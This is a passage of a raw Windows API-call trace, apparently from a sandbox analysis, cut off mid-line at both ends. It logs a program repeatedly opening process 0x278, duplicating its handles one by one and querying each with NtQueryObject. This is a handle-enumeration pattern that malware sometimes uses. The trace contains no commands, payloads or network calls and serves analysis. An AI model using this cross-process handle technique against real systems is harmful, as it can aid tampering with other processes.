ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.995] CloseHandle (hObject=0x1b8) returned 1 [0113.995] CloseHandle (hObject=0x198) returned 1 [0113.995] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.996] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x430, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.996] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.998] CloseHandle (hObject=0x1b8) returned 1 [0113.998] CloseHandle (hObject=0x198) returned 1 [0113.998] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.998] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x434, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.999] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.999] CloseHandle (hObject=0x1b8) returned 1 [0113.999] CloseHandle (hObject=0x198) returned 1 [0113.999] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0113.999] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x438, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.999] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.999] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.999] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.000] CloseHandle (hObject=0x1b8) returned 1 [0114.000] CloseHandle (hObject=0x198) returned 1 [0114.000] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.000] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x43c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.000] CloseHandle (hObject=0x198) returned 1 [0114.000] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.000] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x440, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.000] CloseHandle (hObject=0x198) returned 1 [0114.000] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.001] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x444, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.001] CloseHandle (hObject=0x198) returned 1 [0114.001] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.001] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x448, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.001] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.002] CloseHandle (hObject=0x1b8) returned 1 [0114.002] CloseHandle (hObject=0x198) returned 1 [0114.003] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.003] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x44c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.003] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.003] CloseHandle (hObject=0x1b8) returned 1 [0114.003] CloseHandle (hObject=0x198) returned 1 [0114.003] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.003] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x450, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.004] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.004] CloseHandle (hObject=0x1b8) returned 1 [0114.004] CloseHandle (hObject=0x198) returned 1 [0114.004] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.004] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x454, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.004] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.004] CloseHandle (hObject=0x1b8) returned 1 [0114.005] CloseHandle (hObject=0x198) returned 1 [0114.005] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.005] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x458, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.005] CloseHandle (hObject=0x198) returned 1 [0114.005] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.005] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x45c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.005] CloseHandle (hObject=0x198) returned 1 [0114.005] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.006] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x460, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.006] CloseHandle (hObject=0x198) returned 1 [0114.006] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.006] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x464, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.006] CloseHandle (hObject=0x198) returned 1 [0114.006] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.006] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x468, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.007] CloseHandle (hObject=0x198) returned 1 [0114.007] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.007] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x46c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.007] CloseHandle (hObject=0x198) returned 1 [0114.007] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.007] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x470, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.007] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.007] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.007] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.008] CloseHandle (hObject=0x1b8) returned 1 [0114.008] CloseHandle (hObject=0x198) returned 1 [0114.008] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.008] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x474, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.008] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.008] CloseHandle (hObject=0x1b8) returned 1 [0114.008] CloseHandle (hObject=0x198) returned 1 [0114.008] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.009] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x478, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.009] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.009] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.009] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.009] CloseHandle (hObject=0x1b8) returned 1 [0114.009] CloseHandle (hObject=0x198) returned 1 [0114.009] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.009] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.009] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.010] CloseHandle (hObject=0x1b8) returned 1 [0114.010] CloseHandle (hObject=0x198) returned 1 [0114.010] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.010] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x480, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.010] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.010] CloseHandle (hObject=0x1b8) returned 1 [0114.010] CloseHandle (hObject=0x198) returned 1 [0114.010] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.010] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x484, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.011] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.011] CloseHandle (hObject=0x1b8) returned 1 [0114.011] CloseHandle (hObject=0x198) returned 1 [0114.011] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.011] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x488, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.011] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.012] CloseHandle (hObject=0x1b8) returned 1 [0114.012] CloseHandle (hObject=0x198) returned 1 [0114.012] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.012] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x48c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.012] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.012] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.012] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.012] CloseHandle (hObject=0x1b8) returned 1 [0114.012] CloseHandle (hObject=0x198) returned 1 [0114.013] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.013] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x490, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.013] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.013] CloseHandle (hObject=0x1b8) returned 1 [0114.013] CloseHandle (hObject=0x198) returned 1 [0114.013] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.013] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x494, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.013] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.014] CloseHandle (hObject=0x1b8) returned 1 [0114.014] CloseHandle (hObject=0x198) returned 1 [0114.014] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.014] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x498, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.014] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.014] CloseHandle (hObject=0x1b8) returned 1 [0114.014] CloseHandle (hObject=0x198) returned 1 [0114.014] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.015] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x49c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.015] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.015] CloseHandle (hObject=0x1b8) returned 1 [0114.015] CloseHandle (hObject=0x198) returned 1 [0114.015] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.015] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0114.015] CloseHandle (hObject=0x198) returned 1 [0114.015] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.015] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.016] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.016] CloseHandle (hObject=0x1b8) returned 1 [0114.016] CloseHandle (hObject=0x198) returned 1 [0114.016] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.016] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.016] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.016] CloseHandle (hObject=0x1b8) returned 1 [0114.016] CloseHandle (hObject=0x198) returned 1 [0114.016] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.017] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.017] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.017] CloseHandle (hObject=0x1b8) returned 1 [0114.017] CloseHandle (hObject=0x198) returned 1 [0114.017] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.017] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.017] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.017] CloseHandle (hObject=0x1b8) returned 1 [0114.018] CloseHandle (hObject=0x198) returned 1 [0114.018] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.018] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.018] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.018] CloseHandle (hObject=0x1b8) returned 1 [0114.018] CloseHandle (hObject=0x198) returned 1 [0114.018] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.018] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.018] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.019] CloseHandle (hObject=0x1b8) returned 1 [0114.019] CloseHandle (hObject=0x198) returned 1 [0114.019] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.019] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4bc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.019] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.019] CloseHandle (hObject=0x1b8) returned 1 [0114.019] CloseHandle (hObject=0x198) returned 1 [0114.019] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.020] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4c0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.020] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.020] CloseHandle (hObject=0x1b8) returned 1 [0114.020] CloseHandle (hObject=0x198) returned 1 [0114.020] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.020] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4c4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.020] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.020] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.020] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.021] CloseHandle (hObject=0x1b8) returned 1 [0114.021] CloseHandle (hObject=0x198) returned 1 [0114.021] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.021] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.021] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.021] CloseHandle (hObject=0x1b8) returned 1 [0114.021] CloseHandle (hObject=0x198) returned 1 [0114.021] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.021] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4cc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.022] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.022] CloseHandle (hObject=0x1b8) returned 1 [0114.022] CloseHandle (hObject=0x198) returned 1 [0114.022] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.022] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.022] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.023] CloseHandle (hObject=0x1b8) returned 1 [0114.023] CloseHandle (hObject=0x198) returned 1 [0114.023] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.023] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4d4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: 